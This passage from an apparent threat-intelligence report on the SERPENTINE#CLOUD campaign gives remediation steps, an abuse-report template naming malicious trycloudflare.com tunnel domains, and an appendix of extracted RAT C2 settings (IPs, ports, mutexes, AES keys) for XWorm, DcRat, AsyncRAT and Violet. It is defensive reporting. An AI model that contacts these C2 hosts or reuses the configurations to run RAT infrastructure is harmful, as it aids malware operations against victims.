- Omegatech abuse: abuse@omegatech.ltd — IP 178.16.55[.]160
- ServerAstra abuse: abuse@serverastra.com — IP 91.219.238[.]140
- Tencent Cloud abuse: abuse@tencent.com — IP 43.157.1[.]71
Submit confirmed RAT hashes to MalwareBazaar with tag SERPENTINE-CLOUD and family labels (XWorm, AsyncRAT, DcRat, VenomRAT).
Submit C2 IOCs to ThreatFox: All confirmed C2 IP:port combinations.

Medium-Term (1–3 months)

Consider blanket block of *.trycloudflare.com at the enterprise proxy/DNS level. The legitimate use case (developer tunneling) is rare in most corporate environments and is vastly outweighed by the abuse vector. The Proofpoint ET signatures (SID 2034552, 2058175, 2060250) provide a network-level detection alternative if outright blocking is not feasible.
Notify German CERTs: Submit a campaign report to BSI (Federal Office for Information Security) and CERT-Bund (cert@bsi.de) given the systematic targeting of German-speaking businesses.
Notify UK CERT: Submit IOCs to NCSC UK (report@ncsc.gov.uk) given confirmed UK targeting (UKM batch prefixes).
Deploy YARA rules (Section 9.1) to email gateway and endpoint scanning platforms for retroactive detection of earlier campaign waves.
Mark PhilliVio RAT scripts for priority analysis: The 1MAR30_PHilli_Vioooooooo-obf.py (13.7MB) and 1MAR30_PHilli_Vioooooooo-obf.py samples from Wave 6 represent an uncharacterized RAT family. Full deobfuscation and C2 extraction are required to understand its capabilities and determine if it represents a novel MaaS product.

Abuse Reports

Cloudflare Abuse Report Template

To: registrar-abuse@cloudflare.com Subject: Malware Distribution Abuse — Active SERPENTINE#CLOUD Campaign on trycloudflare.com

Cloudflare Quick Tunnels are being actively abused to distribute malware targeting German-speaking businesses. The following tunnel domains are currently live and serving RAT payloads (AsyncRAT, VenomRAT, custom RAT "PhilliVio") via WsgiDAV WebDAV servers with anonymous read-write access:

named-suites-walked-gratis.trycloudflare.com — Lure delivery server
dresses-but-checkout-quiz.trycloudflare.com — JScript dropper server
asset-military-cycle-appearance.trycloudflare.com — Batch downloader server
investigator-leu-spray-declared.trycloudflare.com — Python RAT payload server

This is part of a campaign tracked as SERPENTINE#CLOUD (Securonix), active since November 2025 with 27+ tunnel domains identified. Full technical report available upon request.

Investigation date: 2026-03-30. Analyst: GHOST — Breakglass Intelligence (intel.breakglass.tech).

References

Securonix: "SERPENTINE#CLOUD: Analyzing New Threat Actor Using Python and Multi-Stage Attack via Cloudflare Tunnels" — https://www.securonix.com/blog/analyzing_serpentinecloud-threat-actors-abuse-cloudflare-tunnels-threat-research/
Proofpoint: "Threat Actor Abuses Cloudflare Tunnels to Deliver RATs" — https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats
Cofense: "Abusing Windows File Explorer and WebDAV for Malware Delivery" — https://cofense.com/blog/abusing-windows-file-explorer-and-webdav-for-malware-delivery
Forcepoint: "AsyncRAT via Python and TryCloudflare" — https://www.forcepoint.com/blog/x-labs/asyncrat-python-trycloudflare-malware
Derp.ca: "Python Loader Evolution - Five Encryption Generations" — https://www.derp.ca/python-loader-evolution/
Breakglass Intelligence Prior Reports:
- Wave 1: shortly-flux-corresponding-junction + licensing-hypothesis-byte-thomas (March 4, 2026)
- Wave 2: opposite-lodge-strict-closes (March 26, 2026)
- Wave 3: fuji-layout-exterior-bunch UK multi-RAT cluster (March 5, 2026)
- Wave 4: move-friendly-international-observed XWorm campaign (March 25, 2026)
- Wave 5: wet-envelope-beam-laser FSL DLL loader (March 26, 2026)

Appendix: Extracted C2 Configurations

XWorm V6.4 (Wave 1 — xwb variant)

C2: 178.16.55[.]160:2323
Key: <666666>
Separator: <XWormmm>
Version: XWorm V6.4 by celestialproject.org
Mutex: USB.exe
AES Key: hP1RGR7hiCmurHiy

XWorm V6.4 (Wave 1 — wx variant)

C2: 43.157.1[.]71:2323
Key: <666666>
Separator: <XWormmm>
Version: XWorm V6.4 by celestialproject.org
Mutex: USB.exe
AES Key: H9r27PXZ8Hi3vMDL

DcRat (Wave 1 — ap variant)

C2: 43.157.1[.]71:3232 (also: 127.0.0.1 as loopback test)
Group: Default
Certificate CN: DcRat
Certificate Issuer: C=CN, L=SH, O=DcRat By qwqdanchun, OU=qwqdanchun, CN=EBOLA
Master Key: A82RoLB2PKbWEikHJ55bENolnscLDEsc
AMSI target: amsi.dll

XWorm V3.1 (Wave 3)

C2: hy647dhon.duckdns[.]org:8292 → 12.202.180[.]133
Mutex: lOyuApQB7sBGSt3o
KEY: <123456789>
Separator: <Xwormmm>
Sleep: 3s
LoggerPath: %TEMP%\Log.tmp

AsyncRAT (Wave 3)

C2: uejrhnfq.duckdns[.]org:6745 → 12.202.180[.]133
Version: 0.5.7B
Mutex: AsyncMutex_6SI8OkPnk
Group: Default
Key: Ff6VygGEmXLxZ17uU1fqBwyv7Not5Jtw
Certificate: CN=AsyncRAT Server (RSA-4096, valid 2024–9999)

DcRAT (Wave 3 — Infected-Anarchy)

C2: y57kdsa.duckdns[.]org:7878 → 12.202.180[.]133
Certificate: CN=DcRat, Issuer CN=EBOLA (same issuer as Wave 1)
Key: EqobtaJh1ra1l2Px0fjvG8Ircxdf2e2P
Salt: DcRatByqwqdanchun

Violet v5 (Wave 3)

C2: volvogroup20.duckdns[.]org:2120 → 12.202.180[.]105
Mutex: XSRSXSX
Version: Violet v5
Delimiter: <Violet>
Auth Key: E8R1a8yU1baxo8ok
XOR decrypt key: AGZOVok

XWorm (Wave 4)

C2: 91.219.238[.]140:7000
Mutex: LApcAYSFOShHukHW
C2 server hostname (RDP cert): DESKTOP-BVGFFOA
Server provider: ServerAstra Kft., Budapest, Hungary

GHOST — Breakglass Intelligence "One indicator. Total infrastructure." intel.breakglass.tech